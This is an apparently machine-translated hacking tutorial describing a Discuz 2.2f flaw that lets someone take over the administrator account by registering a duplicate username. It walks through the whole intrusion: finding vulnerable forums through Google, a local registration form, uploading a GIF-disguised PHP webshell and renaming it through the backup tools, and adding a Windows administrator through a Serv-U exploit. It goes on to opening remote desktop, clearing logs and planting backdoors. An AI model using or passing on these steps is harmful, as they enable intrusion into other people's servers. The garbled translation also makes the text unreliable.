Discuz vulnerability and promotion permissions

Then this statement has changed to the SQL statement above:

SELECT Count (*) from $ TABLE_MEMBERS Where UserName = '$ Username' and

UID = 100000

Since it is used to judge by username and user ID, then this is definitely not established, you can

Successfully skipped

IF ($ DB-> Result ($ query, 0)) {showMessage ('profile_account_duplicate ";

Directly reach here insert record:

$ db-> query ("INSERT INTO $ TABLE_MEMBERS (........) Values ​​(........)");

The same username is also registered. Then look at Memcp.php and see the update user information.

In the case, the SQL statement is actually the case.

Update $ TABLE_MEMBERS SET ... Where username = '$ discuz_user'

Directly modify the password of your registered and administrator's same ID, reach the password of the modification of the administrator

purpose. Ok, let's take a look at the most exciting moments -

Specific use method 1, find by Discuz 2.2f in Google, find it, click on the member, find the administrator's id, put his ID

Added to UP1.php, (Up1.php is written locally: User Name:
Password:
Confirm Password:
E-mail:
) At the "administrator ID", write the address of the website to the IP behind the action, save, then click to browse,

I jump out of you a prompt page, if you are prompt information

The username or email address has been registered, please return to re-filled.

[Click here to return to previous page] "It means unsuccessful, the administrator modifies the vulnerability, if it is" prompt information

Thank you very much for your registration, will now log in to the forum as a member.

If your browser does not automatically jump, please click here "to indicate that the registration and administrator's same ID is successful, huh, we came to" Control Panel "to go in, click" editing

Personal Information, Change Password, and then re-landing you is an administrator, then upgrading permissions, we

Log in to the place where http://xxxxxxxxx/discuz/admincp.php is added to your password,

OK, I will go in, and I have two mid ways to pass a PHP's WebShell. First, you will be in the upload.

Change to the GIF extension of Websehll to pass, then go to background management, point data management -> data backup, will GIF

The format WebShell is restored to .php format, such a WebShell is in / forumdata / Trojan

Word.php, I uploaded is angel's phpspy.php, good function, fast, and then upgrading permissions

I think that the rookies will put it, and the net start is found to open the serv-u quickly and upload a serv-u.

Locally enhances the EXP tool to the current directory, add administrator: Serv-U "Net User Cookie 123 / Add" Serv-U "Net localgroup administrators cookie / add" at the same time I invaded this service

Open 3389, take a luck 1 !! Take the 3389 landing tool, the cute desktop, then clean the day

Zhi, put on the wooden horse, the opening door, I think the phpspy is a good back door, everyone can use themselves

Other good Trojans or back doors, remember the shell (insurance :) two enhancement methods to use data management database upgrade and data backup function, first point the database

Upgrade, "Please apply the database upgrade statement in the following:" Write on the following text: INSERT INTO `CDB_FORUMLINKS`,` DisplayOrder`, `Name`,` URL`,

`Note`,` logo`) Values ​​('', '0', '', '', '' , ''); Then upgrade the database, prompt 'Discuz! Data structure successfully upgraded. Next, change forumdata / dz_1111_vqnys.sql to the extension of .php at the data backup, so

A database file is one of our upload shells, happy! Then write a submission page locally: Up1.php then submit your Trojan successfully, upgrade Permissions are equal>